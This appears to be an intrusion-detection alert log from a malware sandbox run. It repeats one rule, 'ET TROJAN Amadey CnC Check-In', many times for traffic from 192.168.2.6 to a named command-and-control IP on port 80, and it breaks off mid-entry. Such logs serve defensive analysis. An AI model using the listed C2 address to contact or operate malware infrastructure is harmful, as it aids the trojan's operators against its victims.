Timestamp:	192.168.2.662.204.41.450212802027700 02/07/23-20:03:10.483511
SID:	2027700
Source Port:	50212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450466802027700 02/07/23-20:04:15.238349
SID:	2027700
Source Port:	50466
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450164802027700 02/07/23-20:02:58.984888
SID:	2027700
Source Port:	50164
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450377802027700 02/07/23-20:03:53.490589
SID:	2027700
Source Port:	50377
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450123802027700 02/07/23-20:02:45.637795
SID:	2027700
Source Port:	50123
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450308802027700 02/07/23-20:03:36.533930
SID:	2027700
Source Port:	50308
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450336802027700 02/07/23-20:03:43.422466
SID:	2027700
Source Port:	50336
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450206802027700 02/07/23-20:03:08.986816
SID:	2027700
Source Port:	50206
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450438802027700 02/07/23-20:04:08.447686
SID:	2027700
Source Port:	50438
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449819802027700 02/07/23-20:01:17.050746
SID:	2027700
Source Port:	49819
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449920802027700 02/07/23-20:01:44.690559
SID:	2027700
Source Port:	49920
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449831802027700 02/07/23-20:01:19.998060
SID:	2027700
Source Port:	49831
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450450802027700 02/07/23-20:04:11.381589
SID:	2027700
Source Port:	50450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449961802027700 02/07/23-20:01:57.956540
SID:	2027700
Source Port:	49961
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449914802027700 02/07/23-20:01:42.801957
SID:	2027700
Source Port:	49914
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450116802027700 02/07/23-20:02:43.899561
SID:	2027700
Source Port:	50116
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450468802027700 02/07/23-20:04:15.743631
SID:	2027700
Source Port:	50468
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449849802027700 02/07/23-20:01:24.342359
SID:	2027700
Source Port:	49849
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449754802027700 02/07/23-20:00:59.616651
SID:	2027700
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450407802027700 02/07/23-20:04:00.848990
SID:	2027700
Source Port:	50407
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449950802027700 02/07/23-20:01:55.313521
SID:	2027700
Source Port:	49950
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450101802027700 02/07/23-20:02:40.156173
SID:	2027700
Source Port:	50101
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450257802027700 02/07/23-20:03:21.461331
SID:	2027700
Source Port:	50257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450373802027700 02/07/23-20:03:52.533129
SID:	2027700
Source Port:	50373
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450021802027700 02/07/23-20:02:16.175026
SID:	2027700
Source Port:	50021
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450079802027700 02/07/23-20:02:34.128936
SID:	2027700
Source Port:	50079
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449867802027700 02/07/23-20:01:31.342486
SID:	2027700
Source Port:	49867
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450195802027700 02/07/23-20:03:06.319605
SID:	2027700
Source Port:	50195
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449904802027700 02/07/23-20:01:40.346551
SID:	2027700
Source Port:	49904
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450229802027700 02/07/23-20:03:14.593388
SID:	2027700
Source Port:	50229
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450391802027700 02/07/23-20:03:56.919310
SID:	2027700
Source Port:	50391
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449782802027700 02/07/23-20:01:06.291221
SID:	2027700
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450312802027700 02/07/23-20:03:37.521186
SID:	2027700
Source Port:	50312
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449960802027700 02/07/23-20:01:57.722505
SID:	2027700
Source Port:	49960
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449885802027700 02/07/23-20:01:35.593496
SID:	2027700
Source Port:	49885
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450330802027700 02/07/23-20:03:41.942562
SID:	2027700
Source Port:	50330
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449983802027700 02/07/23-20:02:03.190207
SID:	2027700
Source Port:	49983
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450134802027700 02/07/23-20:02:51.667516
SID:	2027700
Source Port:	50134
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450190802027700 02/07/23-20:03:05.082669
SID:	2027700
Source Port:	50190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450285802027700 02/07/23-20:03:30.859758
SID:	2027700
Source Port:	50285
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449922802027700 02/07/23-20:01:45.348252
SID:	2027700
Source Port:	49922
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450126802027700 02/07/23-20:02:46.754869
SID:	2027700
Source Port:	50126
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449726802027700 02/07/23-20:00:52.825969
SID:	2027700
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449839802027700 02/07/23-20:01:21.949196
SID:	2027700
Source Port:	49839
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450089802027700 02/07/23-20:02:37.027588
SID:	2027700
Source Port:	50089
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450167802027700 02/07/23-20:02:59.715669
SID:	2027700
Source Port:	50167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450322802027700 02/07/23-20:03:39.988883
SID:	2027700
Source Port:	50322
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449744802027700 02/07/23-20:00:57.142500
SID:	2027700
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450363802027700 02/07/23-20:03:50.032689
SID:	2027700
Source Port:	50363
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450345802027700 02/07/23-20:03:45.626091
SID:	2027700
Source Port:	50345
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449940802027700 02/07/23-20:01:52.794804
SID:	2027700
Source Port:	49940
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450304802027700 02/07/23-20:03:35.546383
SID:	2027700
Source Port:	50304
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450340802027700 02/07/23-20:03:44.394522
SID:	2027700
Source Port:	50340
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450185802027700 02/07/23-20:03:03.865291
SID:	2027700
Source Port:	50185
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449721802027700 02/07/23-20:00:51.504071
SID:	2027700
Source Port:	49721
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450144802027700 02/07/23-20:02:54.112124
SID:	2027700
Source Port:	50144
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450476802027700 02/07/23-20:04:17.709098
SID:	2027700
Source Port:	50476
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450435802027700 02/07/23-20:04:07.721879
SID:	2027700
Source Port:	50435
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450239802027700 02/07/23-20:03:17.051311
SID:	2027700
Source Port:	50239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450180802027700 02/07/23-20:03:02.871686
SID:	2027700
Source Port:	50180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449792802027700 02/07/23-20:01:10.777922
SID:	2027700
Source Port:	49792
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450381802027700 02/07/23-20:03:54.458167
SID:	2027700
Source Port:	50381
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449816802027700 02/07/23-20:01:16.328216
SID:	2027700
Source Port:	49816
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449970802027700 02/07/23-20:02:00.209993
SID:	2027700
Source Port:	49970
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450458802027700 02/07/23-20:04:13.302774
SID:	2027700
Source Port:	50458
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449857802027700 02/07/23-20:01:28.881945
SID:	2027700
Source Port:	49857
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450162802027700 02/07/23-20:02:58.501955
SID:	2027700
Source Port:	50162
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450417802027700 02/07/23-20:04:03.329321
SID:	2027700
Source Port:	50417
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450335802027700 02/07/23-20:03:43.169376
SID:	2027700
Source Port:	50335
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449973802027700 02/07/23-20:02:00.704664
SID:	2027700
Source Port:	49973
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450298802027700 02/07/23-20:03:34.067174
SID:	2027700
Source Port:	50298
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450295802027700 02/07/23-20:03:33.354558
SID:	2027700
Source Port:	50295
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450038802027700 02/07/23-20:02:20.336644
SID:	2027700
Source Port:	50038
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450154802027700 02/07/23-20:02:56.574090
SID:	2027700
Source Port:	50154
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449887802027700 02/07/23-20:01:36.097176
SID:	2027700
Source Port:	49887
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449762802027700 02/07/23-20:01:01.308698
SID:	2027700
Source Port:	49762
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450090802027700 02/07/23-20:02:37.310665
SID:	2027700
Source Port:	50090
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450332802027700 02/07/23-20:03:42.434857
SID:	2027700
Source Port:	50332
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449930802027700 02/07/23-20:01:50.374173
SID:	2027700
Source Port:	49930
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450267802027700 02/07/23-20:03:26.438067
SID:	2027700
Source Port:	50267
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450409802027700 02/07/23-20:04:01.334892
SID:	2027700
Source Port:	50409
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450448802027700 02/07/23-20:04:10.888532
SID:	2027700
Source Port:	50448
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449826802027700 02/07/23-20:01:18.795280
SID:	2027700
Source Port:	49826
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449945802027700 02/07/23-20:01:54.040738
SID:	2027700
Source Port:	49945
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450157802027700 02/07/23-20:02:57.285145
SID:	2027700
Source Port:	50157
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449752802027700 02/07/23-20:00:59.119449
SID:	2027700
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450111802027700 02/07/23-20:02:42.651134
SID:	2027700
Source Port:	50111
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450371802027700 02/07/23-20:03:52.056353
SID:	2027700
Source Port:	50371
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449829802027700 02/07/23-20:01:19.514063
SID:	2027700
Source Port:	49829
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450445802027700 02/07/23-20:04:10.137178
SID:	2027700
Source Port:	50445
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450259802027700 02/07/23-20:03:22.267663
SID:	2027700
Source Port:	50259
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450478802027700 02/07/23-20:04:18.186763
SID:	2027700
Source Port:	50478
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449790802027700 02/07/23-20:01:10.237146
SID:	2027700
Source Port:	49790
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450129802027700 02/07/23-20:02:48.528501
SID:	2027700
Source Port:	50129
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450152802027700 02/07/23-20:02:56.096465
SID:	2027700
Source Port:	50152
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450193802027700 02/07/23-20:03:05.833351
SID:	2027700
Source Port:	50193
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449741802027700 02/07/23-20:00:56.423673
SID:	2027700
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450437802027700 02/07/23-20:04:08.206570
SID:	2027700
Source Port:	50437
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449818802027700 02/07/23-20:01:16.810089
SID:	2027700
Source Port:	49818
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449902802027700 02/07/23-20:01:39.857998
SID:	2027700
Source Port:	49902
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450011802027700 02/07/23-20:02:13.661822
SID:	2027700
Source Port:	50011
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449859802027700 02/07/23-20:01:29.375750
SID:	2027700
Source Port:	49859
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450230802027700 02/07/23-20:03:14.875718
SID:	2027700
Source Port:	50230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450360802027700 02/07/23-20:03:49.278758
SID:	2027700
Source Port:	50360
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.449724802027700 02/07/23-20:00:52.311391
SID:	2027700
Source Port:	49724
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Amadey CnC Check-In - Source IP: 192.168.2.6 - Destination IP: 62.204.41.4

Timestamp:	192.168.2.662.204.41.450052802027700 02/07/23-20:02:23.740043
SID:	2027700
Source Port:	50052
Destination Port:	80
Protocol:	TCP
